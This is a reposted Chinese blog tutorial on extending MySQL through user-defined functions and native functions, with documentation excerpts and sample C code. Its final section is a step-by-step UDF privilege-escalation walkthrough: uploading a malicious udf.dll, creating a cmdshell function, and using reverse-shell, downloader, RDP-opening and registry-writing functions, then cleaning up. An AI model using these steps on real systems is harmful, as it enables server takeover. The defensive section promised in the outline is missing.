码迷,mamicode.com
首页 > 数据库 > 详细

Adding New Functions to MySQL(User-Defined Function Interface UDF、Native Function)

时间:2015-10-27 21:35:03      阅读:25842      评论:0      收藏:0      [点我收藏+]

标签:

catalog

1. How to Add New Functions to MySQL
2. Features of the User-Defined Function Interface
3. User-Defined Function
4. UDF Argument Processing
5. UDF Return Values and Error Handling
6. UDF Compiling and Installing
7. Adding a New Native Function
8. UDF提权
9. UDF提权防护

 

1. How to Add New Functions to MySQL

There are three ways to add new functions to MySQL:

1. UDF
You can add functions through the user-defined function (UDF) interface. User-defined functions are compiled as object files and then added to and removed from the server dynamically using the CREATE FUNCTION and DROP FUNCTION statements.

2. Native Function
You can add functions as native (built-in) MySQL functions. Native functions are compiled into the mysqld server and become available on a permanent basis.

3. 存储过程
Another way to add functions is by creating stored functions. These are written using SQL statements rather than by compiling object code.

0x1: UDF(User Define Function)和Native Function优缺点

1. If you write user-defined functions, you must install object files in addition to the server itself. If you compile your function into the server, you dont need to do that.

2. Native functions require you to modify a source distribution. UDFs do not. You can add UDFs to a binary MySQL distribution. No access to MySQL source is necessary.

3. If you upgrade your MySQL distribution, you can continue to use your previously installed UDFs, unless you upgrade to a newer version for which the UDF interface changes. For native functions, you must repeat your modifications each time you upgrade.
//Whichever method you use to add new functions, they can be invoked in SQL statements just like native functions such as ABS() or SOUNDEX().

Relevant Link:

https://dev.mysql.com/doc/refman/5.0/en/adding-functions.html

 

2. Features of the User-Defined Function Interface

The MySQL interface for user-defined functions provides the following features and capabilities:

1. Functions can return string, integer, or real values and can accept arguments of those same types.
2. You can define simple functions that operate on a single row at a time, or aggregate functions that operate on groups of rows.
3. Information is provided to functions that enables them to check the number, types, and names of the arguments passed to them.
4. You can tell MySQL to coerce arguments to a given type before passing them to a function.
5. You can indicate that a function returns NULL or that an error occurred.

Relevant Link:

https://dev.mysql.com/doc/refman/5.0/en/udf-features.html

 

3. User-Defined Function

For the UDF mechanism to work, functions must be written in C or C++ and your operating system must support dynamic loading,A UDF contains code that becomes part of the running server, so when you write a UDF, you are bound by any and all constraints that apply to writing server code. For example, you may have problems if you attempt to use functions from the libstdc++ library. Note that these constraints may change in future versions of the server, so it is possible that server upgrades will require revisions to UDFs that were originally written for older servers.

0x1: xxx()

The main function. This is where the function result is computed. The correspondence between the SQL function data type and the return type of your C/C++ function is shown here.

0x2: xxx_init()

The initialization function for xxx(). If present, it can be used for the following purposes:

1. To check the number of arguments to XXX().
2. To verify that the arguments are of a required type or, alternatively, to tell MySQL to coerce arguments to the required types when the main function is called.
3. To allocate any memory required by the main function.
4. To specify the maximum length of the result.
5. To specify (for REAL functions) the maximum number of decimal places in the result.
6. To specify whether the result can be NULL.

0x3: xxx_deinit()

The deinitialization function for xxx(). If present, it should deallocate any memory allocated by the initialization function.
When an SQL statement invokes XXX(), MySQL calls the initialization function xxx_init() to let it perform any required setup, such as argument checking or memory allocation. If xxx_init() returns an error, MySQL aborts the SQL statement with an error message and does not call the main or deinitialization functions. Otherwise, MySQL calls the main function xxx() once for each row. After all rows have been processed, MySQL calls the deinitialization function xxx_deinit() so that it can perform any required cleanup.
For aggregate functions that work like SUM(), you must also provide the following functions:

0x4: xxx_clear()

Reset the current aggregate value but do not insert the argument as the initial aggregate value for a new group.

0x5: xxx_add()

Add the argument to the current aggregate value.

/*
** Syntax for the new aggregate commands are:
** create aggregate function <function_name> returns {string|real|integer}
**          soname <name_of_shared_library>
**
** Syntax for avgcost: avgcost( t.quantity, t.price )
**    with t.quantity=integer, t.price=double
** (this example is provided by Andreas F. Bobak <[email protected]>)
*/


struct avgcost_data
{
  ulonglong    count;
  longlong    totalquantity;
  double    totalprice;
};


/*
** Average Cost Aggregate Function.
*/
my_bool
avgcost_init( UDF_INIT* initid, UDF_ARGS* args, char* message )
{
  struct avgcost_data*    data;

  if (args->arg_count != 2)
  {
    strcpy(
       message,
       "wrong number of arguments: AVGCOST() requires two arguments"
       );
    return 1;
  }

  if ((args->arg_type[0] != INT_RESULT) || (args->arg_type[1] != REAL_RESULT) )
  {
    strcpy(
       message,
       "wrong argument type: AVGCOST() requires an INT and a REAL"
       );
    return 1;
  }

  /*
  **    force arguments to double.
  */
  /*args->arg_type[0]    = REAL_RESULT;
    args->arg_type[1]    = REAL_RESULT;*/

  initid->maybe_null    = 0;        /* The result may be null */
  initid->decimals    = 4;        /* We want 4 decimals in the result */
  initid->max_length    = 20;        /* 6 digits + . + 10 decimals */

  if (!(data = new (std::nothrow) avgcost_data))
  {
    my_stpcpy(message,"Couldn‘t allocate memory");
    return 1;
  }
  data->totalquantity    = 0;
  data->totalprice    = 0.0;

  initid->ptr = (char*)data;

  return 0;
}

void
avgcost_deinit( UDF_INIT* initid )
{
  void *void_ptr= initid->ptr;
  avgcost_data *data= static_cast<avgcost_data*>(void_ptr);
  delete data;
}


/* This is only for MySQL 4.0 compability */
void
avgcost_reset(UDF_INIT* initid, UDF_ARGS* args, char* is_null, char* message)
{
  avgcost_clear(initid, is_null, message);
  avgcost_add(initid, args, is_null, message);
}

/* This is needed to get things to work in MySQL 4.1.1 and above */

void
avgcost_clear(UDF_INIT* initid, char* is_null __attribute__((unused)),
              char* message __attribute__((unused)))
{
  struct avgcost_data* data = (struct avgcost_data*)initid->ptr;
  data->totalprice=    0.0;
  data->totalquantity=    0;
  data->count=        0;
}


void
avgcost_add(UDF_INIT* initid, UDF_ARGS* args,
            char* is_null __attribute__((unused)),
            char* message __attribute__((unused)))
{
  if (args->args[0] && args->args[1])
  {
    struct avgcost_data* data    = (struct avgcost_data*)initid->ptr;
    longlong quantity        = *((longlong*)args->args[0]);
    longlong newquantity    = data->totalquantity + quantity;
    double price        = *((double*)args->args[1]);

    data->count++;

    if (   ((data->totalquantity >= 0) && (quantity < 0))
       || ((data->totalquantity <  0) && (quantity > 0)) )
    {
      /*
      **    passing from + to - or from - to +
      */
      if (   ((quantity < 0) && (newquantity < 0))
         || ((quantity > 0) && (newquantity > 0)) )
      {
    data->totalprice    = price * (double)newquantity;
      }
      /*
      **    sub q if totalq > 0
      **    add q if totalq < 0
      */
      else
      {
    price          = data->totalprice / (double)data->totalquantity;
    data->totalprice  = price * (double)newquantity;
      }
      data->totalquantity = newquantity;
    }
    else
    {
      data->totalquantity    += quantity;
      data->totalprice        += price * (double)quantity;
    }

    if (data->totalquantity == 0)
      data->totalprice = 0.0;
  }
}


double
avgcost( UDF_INIT* initid, UDF_ARGS* args __attribute__((unused)),
         char* is_null, char* error __attribute__((unused)))
{
  struct avgcost_data* data = (struct avgcost_data*)initid->ptr;
  if (!data->count || !data->totalquantity)
  {
    *is_null = 1;
    return 0.0;
  }

  *is_null = 0;
  return data->totalprice/(double)data->totalquantity;
}

0x6: UDFs Handle Flow

MySQL handles aggregate UDFs as follows:

1. Call xxx_init() to let the aggregate function allocate any memory it needs for storing results.
2. Sort the table according to the GROUP BY expression.
3. Call xxx_clear() for the first row in each new group.
4. Call xxx_add() for each row that belongs in the same group.
5. Call xxx() to get the result for the aggregate when the group changes or after the last row has been processed.
6. Repeat steps 3 to 5 until all rows has been processed
7. Call xxx_deinit() to let the UDF free any memory it has allocated.

All functions must be thread-safe. This includes not just the main function, but the initialization and deinitialization functions as well, and also the additional functions required by aggregate functions. A consequence of this requirement is that you are not permitted to allocate any global or static variables that change! If you need memory, you should allocate it in xxx_init() and free it in xxx_deinit().

Relevant Link:

https://dev.mysql.com/doc/refman/5.0/en/adding-udf.html

 

4. UDF Argument Processing

UDF_ARGS是Mysql封装参数的一个结构体,它的地位类似于apache中的request_rec
Mysql\include\mysql_com.h

typedef struct st_udf_args
{
  /* 
  Number of arguments 
  The number of arguments. Check this value in the initialization function if you require your function to be called with a particular number of arguments. For example:
  if (args->arg_count != 2)
  {
      strcpy(message,"XXX() requires two arguments");
      return 1;
  }
  */
  unsigned int arg_count;        

  /* 
  Pointer to item_results 
  A pointer to an array containing the types for each argument. The possible type values are 
  1. STRING_RESULT
  2. INT_RESULT
  3. REAL_RESULT
  4. DECIMAL_RESULT

  To make sure that arguments are of a given type and return an error if they are not, check the arg_type array in the initialization function. For example:
  if (args->arg_type[0] != STRING_RESULT || args->arg_type[1] != INT_RESULT)
  {
      strcpy(message,"XXX() requires a string and an integer");
      return 1;
  }
  */
  enum Item_result *arg_type;        

  /* 
  Pointer to argument 
  args->args communicates information to the initialization function about the general nature of the arguments passed to your function. 
  1. For a constant argument i, args->args[i] points to the argument value. A constant argument is an expression that uses only constants, such as 3 or 4*7-2 or SIN(3.14).
  2. For a nonconstant argument, args->args[i] is 0. A nonconstant argument is an expression that refers to values that may change from row to row, such as column names or functions that are called with nonconstant arguments.

  For each invocation of the main function, args->args contains the actual arguments that are passed for the row currently being processed.
  1. If argument i represents NULL, args->args[i] is a null pointer (0). 
  2. If the argument is not NULL, functions can refer to it as follows:
    1) An argument of type STRING_RESULT is given as a string pointer plus a length, to enable handling of binary data or data of arbitrary length. 
    The string contents are available as args->args[i] and the string length is args->lengths[i]. Do not assume that the string is null-terminated.

    2) For an argument of type INT_RESULT, you must cast args->args[i] to a long long value:
    long long int_val;
    int_val = *((long long*) args->args[i]);

  3) For an argument of type REAL_RESULT, you must cast args->args[i] to a double value:
  double    real_val;
  real_val = *((double*) args->args[i]);

  4) For an argument of type DECIMAL_RESULT, the value is passed as a string and should be handled like a STRING_RESULT value.
  5) ROW_RESULT arguments are not implemented.
  */
  char **args;            

  /* 
  Length of string arguments 
  For the initialization function, the lengths array indicates the maximum string length for each argument. You should not change these. 
  For each invocation of the main function, lengths contains the actual lengths of any string arguments that are passed for the row currently being processed. 
  For arguments of types INT_RESULT or REAL_RESULT, lengths still contains the maximum length of the argument (as for the initialization function).
  */
  unsigned long *lengths;        

  /* 
  Set to 1 for all maybe_null args 
  For the initialization function, the maybe_null array indicates for each argument whether the argument value might be null (0 if no, 1 if yes).
  */
  char *maybe_null;            

  /* 
  Pointer to attribute name 
  args->attributes communicates information about the names of the UDF arguments. 
  For argument i, the attribute name is available as a string in args->attributes[i] and the attribute length is args->attribute_lengths[i]. Do not assume that the string is null-terminated.
  By default, the name of a UDF argument is the text of the expression used to specify the argument. 
  For UDFs, an argument may also have an optional [AS] alias_name clause, in which case the argument name is alias_name. The attributes value for each argument thus depends on whether an alias was given.

  Suppose that a UDF my_udf() is invoked as follows: SELECT my_udf(expr1, expr2 AS alias1, expr3 alias2);
  In this case, the attributes and attribute_lengths arrays will have these values: 
  args->attributes[0] = "expr1"
  args->attribute_lengths[0] = 5

  args->attributes[1] = "alias1"
  args->attribute_lengths[1] = 6

  args->attributes[2] = "alias2"
  args->attribute_lengths[2] = 6
  */
  char **attributes;   

  /* 
  Length of attribute arguments 
  The attribute_lengths array indicates the length of each argument name.     
  */ 
  unsigned long *attribute_lengths;     
  void *extension;
} UDF_ARGS;

Relevant Link:

https://dev.mysql.com/doc/refman/5.0/en/udf-arguments.html

 

5. UDF Return Values and Error Handling

The initialization function should return 0 if no error occurred and 1 otherwise. If an error occurs, xxx_init() should store a null-terminated error message in the message parameter. The message is returned to the client. The message buffer is MYSQL_ERRMSG_SIZE characters long, but you should try to keep the message to less than 80 characters so that it fits the width of a standard terminal screen.
The return value of the main function xxx() is the function value, for long long and double functions. A string function should return a pointer to the result and set *length to the length (in bytes) of the return value. For example:

memcpy(result, "result string", 13);
*length = 13;

To indicate a return value of NULL in the main function, set *is_null to 1:

*is_null = 1;

To indicate an error return in the main function, set *error to 1:

*error = 1;

Relevant Link:

https://dev.mysql.com/doc/refman/5.0/en/udf-return-values.html

 

6. UDF Compiling and Installing

Files implementing UDFs must be compiled and installed on the host where the server runs. This process is described below for the example UDF file sql/udf_example.c that is included in the MySQL source distribution.
The udf_example.c file contains the following functions:

1. metaphon() returns a metaphon string of the string argument. This is something like a soundex string, but it is more tuned for English.
2. myfunc_double() returns the sum of the ASCII values of the characters in its arguments, divided by the sum of the length of its arguments.
3. myfunc_int() returns the sum of the length of its arguments.
4. sequence([const int]) returns a sequence starting from the given number or 1 if no number has been given.
5. lookup() returns the IP address for a host name.
6. reverse_lookup() returns the host name for an IP address. The function may be called either with a single string argument of the form xxx.xxx.xxx.xxx or with four numbers.
7. avgcost() returns an average cost. This is an aggregate function.

A dynamically loadable file should be compiled as a sharable object file, using a command something like this:

gcc -shared -o udf_example.so udf_example.c

If you are using gcc with configure and libtool (which is how MySQL is configured), you should be able to create udf_example.so with a simpler command:

make udf_example.la

Relevant Link: 

https://github.com/megastep/mysql-udf 
http://www.linuxidc.com/Linux/2011-06/37441.htm
http://www.toadworld.com/platforms/mysql/w/wiki/6573.udf-compiling-the-c-program
http://www.bccn.net/Article/sjk/mysql/jszl/200601/3371.html

 

7. Adding a New Native Function

Relevant Link:

https://dev.mysql.com/doc/refman/5.0/en/adding-native-function.html

 

8. UDF提权

0x1: 通过FTP、WEBSHELL方式上传UDF DLL文件

1. 获取目标Mysql DB的帐号
/*
root:111
*/

2. 上传udf.dll文件: 事先编译好udf.dll文件
    1)[ ~ , mysql 5.0]: 对任何目录可写,无需考虑权限问题
    2) 5.0, 5.1]: 必须将DLL导出到目标机器的系统目录(C:\WINDOWS或C:\WINDOWS\system32),否则在下一步操作中你会看到"No paths allowed for shared library"错误(因为5.0之后不允许使用全路径加载UDF)
    3) [5.1, ~]: 不能导出到系统目录,导出到需要使用 show variables like %plugin%;  语句查看插件安装路径。导出dll时指定此路径,然后在下一步操作中就可以直接填文件名即可
//C:/wamp/bin/mysql/mysql5.5.20/lib/plugin/udf.dll

3. 导入udf.dll(对于MYSQL5.0以上版本,语句中的DLL不允许带全路径)
/*
create function cmdshell returns string soname ‘udf.dll‘ 
创建的函数需要和udf.dll中声明的导出函数一致
*/

4. 正确创建功能函数后,你就可以用SQL语句来使用这些功能了
/*
select cmdshell("net user"); 

功能函数说明
1. cmdshell: 执行cmd
2. downloader: 下载者,到网上下载指定文件并保存到指定目录 
3. open3389: 通用开3389终端服务,可指定端口(不改端口无需重启) 
4. backshell: 反弹Shell
5. ProcessView: 枚举系统进程
6. KillProcess: 终止指定进程
7. regread: 读注册表
8. regwrite: 写注册表
9. shut: 关机、注销、重启
10. about: 说明与帮助函数
*/ 

5. 使用完成后你可能需要删除在第二步中导出的DLL,但在删除DLL前请先删除你在第三步中创建的函数,否则删除操作将失败
//select * from mysql.func;
//drop function cmdshell

技术分享